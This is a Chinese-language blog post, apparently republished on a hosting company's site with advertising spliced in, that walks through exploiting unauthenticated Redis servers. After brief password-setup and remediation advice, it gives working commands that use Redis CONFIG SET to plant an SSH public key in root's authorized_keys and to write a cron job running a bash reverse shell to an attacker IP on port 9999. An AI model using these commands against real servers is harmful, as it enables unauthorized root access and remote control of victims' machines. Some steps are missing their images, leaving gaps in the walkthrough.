各位大佬好！好久沒寫過博客記錄了，最近挖了個redis未授權(quán)訪問漏洞，并利用了一番，在此，分享下這個雞肋卻能直接獲得服務(wù)器權(quán)限的漏洞。

創(chuàng)新互聯(lián)長期為上千余家客戶提供的網(wǎng)站建設(shè)服務(wù)，團隊從業(yè)經(jīng)驗10年，關(guān)注不同地域、不同群體，并針對不同對象提供差異化的產(chǎn)品和服務(wù)；打造開放共贏平臺，與合作伙伴共同營造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為常山企業(yè)提供專業(yè)的網(wǎng)站設(shè)計制作、成都做網(wǎng)站，常山網(wǎng)站改版等技術(shù)服務(wù)。擁有十年豐富建站經(jīng)驗和眾多成功案例,為您定制開發(fā)。

0x01:redis基礎(chǔ)

Redis默認(rèn)配置是不需要密碼認(rèn)證的，也就是說只要連接的Redis服務(wù)器的host和port正確，就可以連接使用。這在安全性上會有一定的問題，所以需要啟用Redis的認(rèn)證密碼，增加Redis服務(wù)器的安全性。

• 修改配置文件

Redis的配置文件默認(rèn)在/etc/redis.conf，找到如下行：

#requirepass foobared
去掉前面的注釋，并修改為所需要的密碼：

requirepass myPassword （其中myPassword就是要設(shè)置的密碼）

• 重啟Redis

如果Redis已經(jīng)配置為service服務(wù)，可以通過以下方式重啟：

service redis restart
如果Redis沒有配置為service服務(wù)，可以通過以下方式重啟：

/usr/local/bin/redis-cli shutdown
/usr/local/bin/redis-server /etc/redis.conf

• 登錄驗證

設(shè)置Redis認(rèn)證密碼后，客戶端登錄時需要使用-a參數(shù)輸入認(rèn)證密碼，不添加該參數(shù)雖然也可以登錄成功，但是沒有任何操作權(quán)限。如下：

$ ./redis-cli -h 127.0.0.1 -p 6379
127.0.0.1:6379> keys *
(error) NOAUTH Authentication required.
使用密碼認(rèn)證登錄，并驗證操作權(quán)限：

$ ./redis-cli -h 127.0.0.1 -p 6379 -a myPassword
127.0.0.1:6379> config get requirepass
1) "requirepass"
2) "myPassword"
看到類似上面的輸出，說明Reids密碼認(rèn)證配置成功。

0x02漏洞描述

漏洞描述：
Redis因配置不當(dāng)可以未授權(quán)訪問，被***者惡意利用。
***者無需認(rèn)證訪問到內(nèi)部數(shù)據(jù)，可能導(dǎo)致敏感信息泄露，***也可以惡意執(zhí)行flushall來清空所有數(shù)據(jù)。
***者可通過EVAL執(zhí)行l(wèi)ua代碼，或通過數(shù)據(jù)備份功能往磁盤寫入后門文件。
如果Redis以root身份運行，***可以給root賬戶寫入SSH公鑰文件，直接通過SSH登錄受害服務(wù)器。

危害：
***者可利用該漏洞寫入計劃任務(wù)反彈shell
***者可利用該漏洞寫入ssh公鑰遠程連接。

0x03：漏洞利用

1. 使用redis連接工具連接。windows下學(xué)習(xí)和連接redis，redis下載地址：https://github.com/dmajkic/redis/downloads
2. 使用redis-cli.exe連接
   

0x04:漏洞高級利用

利用原理：
1） SSH免密碼登錄，Linux下可以設(shè)置SSH免密碼登錄，方法為使用"公私鑰"認(rèn)證，即首先在客戶端上創(chuàng)建一對公私鑰 （公鑰文件：~/.ssh/id_rsa.pub； 私鑰文件：~/.ssh/id_rsa）。然后把公鑰放到服務(wù)器上（~/.ssh/authorized_keys）, 自己保留好私鑰.在使用ssh登錄時,ssh程序會發(fā)送私鑰去和服務(wù)器上的公鑰做匹配.如果匹配成功就可以登錄了。詳細可參考（http://jingyan.baidu.com/article/2fb0ba4043124a00f2ec5f0f.html ）SSH免密碼登陸遠程服務(wù)器

2）Redis可通過Redis-CLI遠程管理，設(shè)置Redis的默認(rèn)路徑以及數(shù)據(jù)庫緩存文件。
方法如下：
config set dir /xxx
config set dbfilename xxxx
set xxxx "xxx"<br/>save

• 漏洞條件

1.Redis服務(wù)使用ROOT賬號啟動
2.Redis服務(wù)無密碼認(rèn)證或者使用的是弱口令進行認(rèn)證
3.服務(wù)器開放了SSH服務(wù)，而且允許使用密鑰登錄，即可遠程寫入一個公鑰，直接登錄遠程服務(wù)器。

首先在本地生成一對密鑰：

然后通過redis-clis遠程連接到目標(biāo)redis服務(wù)器，執(zhí)行以下命令

config set dir /root/.ssh/
config set dbfilename authorized_keys

set xxxx "\n\n\nssh-rsa key_pub\n\n\n"，其中key_pub為上圖生成的公鑰，即可將公鑰保存在遠端服務(wù)器，使得登錄時不需要輸入賬號與密碼。Redis已經(jīng)因該漏洞被***，并在其緩存數(shù)據(jù)庫中發(fā)現(xiàn)被寫入的公鑰，建議用戶馬上對內(nèi)部網(wǎng)絡(luò)進行排查。

反彈shell

1、telnet登錄/也可以redis-cli登錄

telnet 192.168.236.130 6379//未授權(quán)登錄

config set dir /var/spool/cron/ //配置文件夾的路徑（CONFIG SET 命令可以動態(tài)地調(diào)整 Redis 服務(wù)器的配置而(configuration)而無須重啟。）//每個用戶生成的crontab文件，都會放在 /var/spool/cron/ 目錄下面

set -.- "\n\n\n* * * * * bash -i >& /dev/tcp/192.168.236.129/9999 0>&1\n\n\n"//直接往當(dāng)前用戶的crontab里寫入反彈shell，換行是必不可少的。

2.nc反彈

3.Centos里面查看crontab任務(wù)。

0x06:漏洞修復(fù)

該漏洞的修補方法如下：
1）禁止使用 root 權(quán)限啟動 redis 服務(wù)；
2）對 redis 訪問啟用密碼認(rèn)證，并且添加 IP 訪問限制；
3）盡可能不對公網(wǎng)直接開放 SSH 服務(wù)。

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)scvps.cn，海內(nèi)外云服務(wù)器15元起步，三天無理由+7*72小時售后在線，公司持有idc許可證，提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國服務(wù)器、虛擬主機、免備案服務(wù)器”等云主機租用服務(wù)以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡單易用、服務(wù)可用性高、性價比高”等特點與優(yōu)勢，專為企業(yè)上云打造定制，能夠滿足用戶豐富、多元化的應(yīng)用場景需求。

分享標(biāo)題：redis未授權(quán)訪問漏洞利用-創(chuàng)新互聯(lián)
當(dāng)前URL：http://www.chinadenli.net/article2/dcdioc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供App開發(fā)、移動網(wǎng)站建設(shè)、網(wǎng)站建設(shè)、域名注冊、網(wǎng)站設(shè)計、網(wǎng)頁設(shè)計公司

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)